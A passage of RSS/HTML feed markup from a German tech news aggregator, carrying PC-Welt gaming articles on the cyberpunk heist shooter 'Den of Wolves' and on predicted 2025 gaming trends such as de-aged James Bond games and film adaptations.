https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_08.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_08.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Synethra – Kazuko – Vtashi: Den of Wolves dürfte ein Heist-Koop-Shooter werden in einer Welt, die 10 Chambers auf einem ähnlich hohen Detail- und Storytelling-Level wie die Konzerne in Cyberpunk 2077 inszeniert." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Synethra – Kazuko – Vtashi: Den of Wolves dürfte ein Heist-Koop-Shooter werden in einer Welt, die 10 Chambers auf einem ähnlich hohen Detail- und Storytelling-Level wie die Konzerne in Cyberpunk 2077 inszeniert.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p><strong><em>Den of Wolves </em>soll sich epischer anfühlen und mehr Storytelling abliefern:</strong> Geschichten erzählen, sich wie ein großer Abenteuer anfühlen – mehr <em>Cyberpunk 2077</em> als <em>GTFO </em>in der Art, wie es seine Welt zeichnet, mit in sich geschlossenen Episoden im Stil von <em>Black Mirror</em>, die auf einen großen, alles überragenden Plot einzahlen.</p>



<p>Es spielt in Midway City im Jahr 2097, das mit seinen Neon-Fassaden und Hightech-Wolkenkratzern durchaus an Night City erinnert und die Fans von <em>Cyberpunk 2077</em> voll abholen dürfte.</p>



<p><a href="https://www.amazon.de/Cyberpunk-2077-Ultimate-Edition-PS5-Spiel/dp/B0CNTH38H5/" target="_blank" rel="noreferrer noopener">Cyberpunk 2077: Ultimate Edition bei Amazon</a></p>



<p><strong>Den of Wolves: Das erste Making-of:</strong></p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p>Es hat kooperativen Multiplayer in seiner DNA. Vor jedem Heist gibt es eine Planungsphase, ein bisschen wie die Operations in <em>GTA Online</em> mit Quests, in denen wir Informationen sammeln, etwa wo sich das Ziel befindet.</p>



<p>Wie sich physische Gebäude infiltrieren lassen, um sich überhaupt erst neuronal reinzuhacken – in diese <em>Inception</em>-ähnlichen Gedanken-Paläste. Stealth und Action sollen sich stark abwechseln.</p>



<p>Wer einmal losballert, der ist nicht auf den reinen Shooter-Part limitiert, sondern soll immer wieder zurück zu Stealth finden können. Ein Klon des Sicherheitschefs oder CEOs? Schon sind wir wieder im Spiel.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2583267","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Insbesondere wie das Studio Licht, Schatten oder dieses rote Neon-Licht atmosph\u00e4risch einsetzt, erinnert sehr an Hollywood \u2013 an Christopher Nolans Tenet oder auch die Shanghai-Szene aus James Bond Skyfall, Daniel Craigs besten Bond.","alt":"Insbesondere wie das Studio Licht, Schatten oder dieses rote Neon-Licht atmosph\u00e4risch einsetzt, erinnert sehr an Hollywood \u2013 an Christopher Nolans Tenet oder auch die Shanghai-Szene aus James Bond Skyfall, Daniel Craigs besten Bond."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_09.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Insbesondere wie das Studio Licht, Schatten oder dieses rote Neon-Licht atmosphärisch einsetzt, erinnert sehr an Hollywood – an Christopher Nolans Tenet oder auch die Shanghai-Szene aus James Bond Skyfall, Daniel Craigs besten Bond." class="wp-image-2583267" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_09.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_09.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_09.jpeg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_09.jpeg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_09.jpeg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_09.jpeg?resize=2048%2C1152&amp;quality=50&amp;strip=all 2048w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_09.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_09.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Insbesondere wie das Studio Licht, Schatten oder dieses rote Neon-Licht atmosphärisch einsetzt, erinnert sehr an Hollywood – an Christopher Nolans Tenet oder auch die Shanghai-Szene aus James Bond Skyfall, Daniel Craigs besten Bond." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Insbesondere wie das Studio Licht, Schatten oder dieses rote Neon-Licht atmosphärisch einsetzt, erinnert sehr an Hollywood – an Christopher Nolans Tenet oder auch die Shanghai-Szene aus James Bond Skyfall, Daniel Craigs besten Bond.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Midway City ist ein Land der Chancenlosigkeit, dessen innovativste Technologien der elitären Oberschicht vorbehalten sind, während die anderen ums Überleben kämpfen. </p>



<p>So weit, so Cyberpunk – doch <em>Den Of Wolves</em> interessiert sich mehr für die “Zukunft des Jetzt” als für kybernetische Gliedmaßen und Laser-Sniper-Augen. Und ist eher inspiriert von <em>Black Mirror </em>und <em>Westworld </em>– Serien, die unsere Welt ein paar Jahre weiterdenken.</p>



<p>Schauen wir uns Elon Musks Optimus Gen 3 Roboter an, kombinieren ihn mit der Hauttechnologie, die etwa bereits heute für Sex-Dolls verwendet wird und der Echtzeit-Sprach-KI von Open AI, und wir sind vielleicht noch ein Jahrzehnt von <em>Westworld</em> entfernt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2583268","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: So wie sich Gefechte in Inception echt anf\u00fchlen, als w\u00fcrden sie in der Realit\u00e4t stattfinden. Ist das in Den of Wolves auch. Was ist echt, was manipuliert? Was kontrollieren wir; wo werden wir kontrolliert\u2026","alt":"So wie sich Gefechte in Inception echt anf\u00fchlen, als w\u00fcrden sie in der Realit\u00e4t stattfinden. Ist das in Den of Wolves auch. Was ist echt, was manipuliert? Was kontrollieren wir; wo werden wir kontrolliert\u2026"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_10.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="So wie sich Gefechte in Inception echt anfühlen, als würden sie in der Realität stattfinden. Ist das in Den of Wolves auch. Was ist echt, was manipuliert? Was kontrollieren wir; wo werden wir kontrolliert…" class="wp-image-2583268" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_10.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_10.jpeg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_10.jpeg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_10.jpeg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_10.jpeg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_10.jpeg?resize=2048%2C1152&amp;quality=50&amp;strip=all 2048w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_10.jpeg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/DenofWolves_10.jpeg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: So wie sich Gefechte in Inception echt anfühlen, als würden sie in der Realität stattfinden. Ist das in Den of Wolves auch. Was ist echt, was manipuliert? Was kontrollieren wir; wo werden wir kontrolliert…" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>So wie sich Gefechte in Inception echt anfühlen, als würden sie in der Realität stattfinden. Ist das in Den of Wolves auch. Was ist echt, was manipuliert? Was kontrollieren wir; wo werden wir kontrolliert…</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Und auch wenn das erste Gameplay schon richtig kracht, die Kugeln nur so die Wände zerfetzen und sich dieses <em>Payday </em>und <em>GTFO</em>-Gefühl auf Hollywood-Level bereits zeigt.</p>



<p>Spannend wird vor allem auch sein, wie 10 Chambers seine <em>Hitman</em>-artigen Level mit Koop verheiratet. Wir sehen etwa einen sehr dunklen, kaum beleuchteten Club mit tausenden von Ravern, in dem wohl ein Heist stattfindet.</p>



<p>Und genau wie in <em>Hitman </em>können wir Zivilisten erschießen, es wirkt sich nur auf unser Rating aus. Konzern-Kunden heuern uns ja an, damit ihnen nicht selbst das Blut von den Händen tropft …</p>



<p><strong>Den of Wolves erscheint für PC, PS5 // PS5 Pro sowie Xbox Series X/S. Einen Release-Termin gibt es noch nicht, wir tippen auf 2026.</strong></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die drei größten Gaming-Trends 2025]]></title>
<description><![CDATA[Das Gaming-Jahr 2024 ist vorbei und brachte einige neue Entwicklungen mit sich. Sowohl positive als auch negative.



Höchste Zeit also für einen Blick in die Glaskugel: Was könnten die größten Trends für 2025 werden?



Trend 1: Bringt De-aging die größten James-Bonds zurück?



			
				
			
		0...]]></description>
<link>https://tsecurity.de/de/2566742/windows-tipps/die-drei-groessten-gaming-trends-2025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2566742/windows-tipps/die-drei-groessten-gaming-trends-2025/</guid>
<pubDate>Wed, 22 Jan 2025 13:38:22 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das Gaming-Jahr 2024 ist vorbei und brachte einige neue Entwicklungen mit sich. Sowohl positive als auch negative.</p>



<p>Höchste Zeit also für einen Blick in die Glaskugel: Was könnten die größten Trends für 2025 werden?</p>



<h2 class="wp-block-heading toc">Trend 1: Bringt De-aging die größten James-Bonds zurück?</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569900","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: 007 Nightfire hatte alles, was ein gutes Bond-Game braucht: Pierce Brosnan, hei\u00dfe Bond-Girls, wilde Schie\u00dfereien und Aston-Martin-Verfolgungsjagden.","alt":"007 Nightfire hatte alles, was ein gutes Bond-Game braucht: Pierce Brosnan, hei\u00dfe Bond-Girls, wilde Schie\u00dfereien und Aston-Martin-Verfolgungsjagden."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?quality=50&amp;strip=all&amp;w=1200" alt="007 Nightfire hatte alles, was ein gutes Bond-Game braucht: Pierce Brosnan, heiße Bond-Girls, wilde Schießereien und Aston-Martin-Verfolgungsjagden." class="wp-image-2569900" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?quality=50&amp;strip=all 1920w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?resize=300%2C117&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?resize=768%2C298&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?resize=1200%2C466&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_02.jpg?resize=1536%2C597&amp;quality=50&amp;strip=all 1536w" width="1200" height="466" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: 007 Nightfire hatte alles, was ein gutes Bond-Game braucht: Pierce Brosnan, heiße Bond-Girls, wilde Schießereien und Aston-Martin-Verfolgungsjagden." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>007 Nightfire hatte alles, was ein gutes Bond-Game braucht: Pierce Brosnan, heiße Bond-Girls, wilde Schießereien und Aston-Martin-Verfolgungsjagden.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Industrial Might &amp; Magic überraschte uns alle in <em>Indiana Jones und das Rad des Schicksals</em>, wie gut mittlerweile <strong>De-aging-Technologie</strong> funktioniert.</p>



<p>Mithilfe von Photogrammetrie, Machine Learning und KI-Algorithmen, die altes Footage des jungen Harrison Ford in 8K verwandelt hat, wurden 25 Minuten maximaler Nostalgie-Faktor geschaffen. Es ist technologische Magie, die uns alte Helden zurückbringen kann. So sehr wir Harrison Ford lieben, er ist eben nicht mehr der Held unserer Kindheit.</p>



<p>Und das ist auch völlig normal – wir alle können dankbar sein, wenn wir mit über 80 Jahren noch so fit sind. Er lebt auf einer Ranch und reitet jeden Tag auf seinen Pferden, das hält jung. </p>



<p>Doch was wäre denn, wenn Hollywood und Spielestudios diese De-aging-Technologie nutzen, um Sean Connery, Roger Moore und den Bond aller Bonds Pierce Brosnan in ihrer Blütezeit zurückzuholen? </p>



<p>Machine Games ist genau das gerade mit dem Spiel <a href="https://www.pcwelt.de/article/2554742/indiana-jones-und-der-grosse-kreis-test-review.html" target="_blank" rel="noreferrer noopener">Indiana Jones und der große Kreis</a> gelungen – ihr Indy ist nahezu 1:1 der junge Harrison Ford, es ist der Hammer. Brosnan ist auch heute noch ein fantastischer Schauspieler, er könnte seinem Bond zumindest seine Stimme leihen.</p>



<p><strong>Überblick:</strong> <a href="https://www.pcwelt.de/article/2519250/indiana-jones-und-der-grosse-kreis-preview.html" target="_blank" rel="noreferrer noopener">Indiana Jones und der große Kreis: Das bessere Uncharted?</a></p>



<p>Aber Pierce Brosnan hat noch nie im Motion-Capture-Anzug gespielt für ein neues James-Bond-Game. Wie fantastisch geeignet wäre ein Film wie <em>James Bond: Der Morgen stirbt nie</em>, in der der irre Medien-Mogul Elliot Carver mit einem Stealth-Kriegsschiff die britische und amerikanische Navy angreift, um es in einen Blockbuster für PS5, Xbox Series X und den PC zu verwandeln.</p>



<p>Es gibt zwar ein paar Videogames mit Brosnan als Bond wie das famose Nightfire, aber das wurde ursprünglich für die Playstation 2 entwickelt. Wie wäre es mit einem Unreal-Engine-5-Remake, bei dem 007 richtig lebensecht rüberkommt dank dieser De-aging-Technologie?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569903","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Ein neues Bond-Spiel mit einem virtuell verj\u00fcngten Pierce Brosnan? Wir w\u00e4ren sofort dabei. Es waren die besseren Filme \u2013 mit viel mehr Gadgets, wilden Stunts und insgesamt h\u00f6herem Spa\u00dffaktor. Die Craig-Bonds waren gut geschrieben, aber etwas lahm inszeniert.","alt":"Ein neues Bond-Spiel mit einem virtuell verj\u00fcngten Pierce Brosnan? Wir w\u00e4ren sofort dabei. Es waren die besseren Filme \u2013 mit viel mehr Gadgets, wilden Stunts und insgesamt h\u00f6herem Spa\u00dffaktor. Die Craig-Bonds waren gut geschrieben, aber etwas lahm inszeniert."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Ein neues Bond-Spiel mit einem virtuell verjüngten Pierce Brosnan? Wir wären sofort dabei. Es waren die besseren Filme – mit viel mehr Gadgets, wilden Stunts und insgesamt höherem Spaßfaktor. Die Craig-Bonds waren gut geschrieben, aber etwas lahm inszeniert." class="wp-image-2569903" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=2048%2C1152&amp;quality=50&amp;strip=all 2048w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_04_fixed.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Ein neues Bond-Spiel mit einem virtuell verjüngten Pierce Brosnan? Wir wären sofort dabei. Es waren die besseren Filme – mit viel mehr Gadgets, wilden Stunts und insgesamt höherem Spaßfaktor. Die Craig-Bonds waren gut geschrieben, aber etwas lahm inszeniert." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Ein neues Bond-Spiel mit einem virtuell verjüngten Pierce Brosnan? Wir wären sofort dabei. Es waren die besseren Filme – mit viel mehr Gadgets, wilden Stunts und insgesamt höherem Spaßfaktor. Die Craig-Bonds waren gut geschrieben, aber etwas lahm inszeniert.</p>
</figcaption></figure><p class="imageCredit">MGM und Eon Productions</p></div>



<p>Und weil die Connery-Bond-Ära von den frühen 60ern bis in die 80er reichte, gibt es von ihm nur ein einziges Videospiel: <em>From Russia with Love</em> (Liebesgrüße aus Moskau).</p>



<p>Gerade erst gingen erste Szenen eines möglichen LEGO-James-Bond-Spiels viral, in dem TT Games aus England die berühmtesten Szenen aller 24 Bond-Filme, etwa den Lauf über die Krokodile in <em>James Bond 007: Leben und Sterben lassen</em>, in LEGO-Videospiel-Form wieder hat auferstehen lassen.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p>Und auf Amazon Prime durften wir alle James-Bond-Filme von Sean Connery über George Lazenby, Roger Moore und Timothy Dalton bis zu Pierce Brosnan auf Amazon Prime als 4K-Remaster erleben. Es wird Zeit, ihnen die Games zu widmen, die sie verdient haben.</p>



<p><strong>Ein Muss für Bond-Fans:</strong> <a href="https://www.amazon.de/James-Bond-Die-Jubil%C3%A4ums-Collection-Blu-ray/dp/B00DRYZDSK" target="_blank" rel="noreferrer noopener">Alle 24 James-Bond-Filme als Blu-ray Collection</a></p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569915","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: F\u00fcr die Sean-Connery-\u00c4ra gibt\u2019s nur ein einziges Spiel - From Russia with Love \/\/ Liebesgr\u00fc\u00dfe aus Moskau. Ein neues Game w\u00e4re auch die Chance den Sexappeal der alten Bonds zur\u00fcckzubringen.","alt":"F\u00fcr die Sean-Connery-\u00c4ra gibt\u2019s nur ein einziges Spiel - From Russia with Love \/\/ Liebesgr\u00fc\u00dfe aus Moskau. Ein neues Game w\u00e4re auch die Chance den Sexappeal der alten Bonds zur\u00fcckzubringen."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Für die Sean-Connery-Ära gibt’s nur ein einziges Spiel - From Russia with Love // Liebesgrüße aus Moskau. Ein neues Game wäre auch die Chance den Sexappeal der alten Bonds zurückzubringen." class="wp-image-2569915" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?quality=50&amp;strip=all 2560w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?resize=300%2C163&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?resize=768%2C416&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?resize=1200%2C650&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?resize=1536%2C832&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2025/01/GamingTrends2025_05.jpeg?resize=2048%2C1110&amp;quality=50&amp;strip=all 2048w" width="1200" height="650" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Für die Sean-Connery-Ära gibt’s nur ein einziges Spiel - From Russia with Love // Liebesgrüße aus Moskau. Ein neues Game wäre auch die Chance den Sexappeal der alten Bonds zurückzubringen." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Für die Sean-Connery-Ära gibt’s nur ein einziges Spiel – From Russia with Love // Liebesgrüße aus Moskau. Ein neues Game wäre auch die Chance, den Sexappeal der alten Bonds zurückzubringen.</p></figcaption></figure><p class="imageCredit">MGM und Eon Productions</p></div>



<h2 class="wp-block-heading toc">Trend 2: Mehr Filmadaptionen</h2>



<p>Wonder Woman und The Dark Knight als Singleplayer-Epos; Aquaman als majestätische Unterwasser-Open-World: Nach dem Mega-Erfolg von <a href="https://www.amazon.de/Hogwarts-Legacy-for-PlayStation-4/dp/B09W4GVQBV/" target="_blank" rel="noreferrer noopener">Hogwarts Legacy</a> dürfte Warner 2025 mehr Filmwelten auf PC, Xbox Series und PS5 bringen</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2569917","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Monolith (Shadows of Mordor) arbeiten bereits seit 2020 an einem Singleplayer-Epos zu Wonder Woman. Die ersten Concept Arts erinnern von der Atmosph\u00e4re wohlig an die brillanten Filme mit Gal Gadot.","alt":"Monolith (Shadows of Mordor) arbeiten bereits seit 2020 an einem Singleplayer-Epos zu Wonder Woman. Die ersten Concept Arts erinnern von der Atmosph\u00e4re wohlig an die brillanten Filme mit Gal Gadot."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" 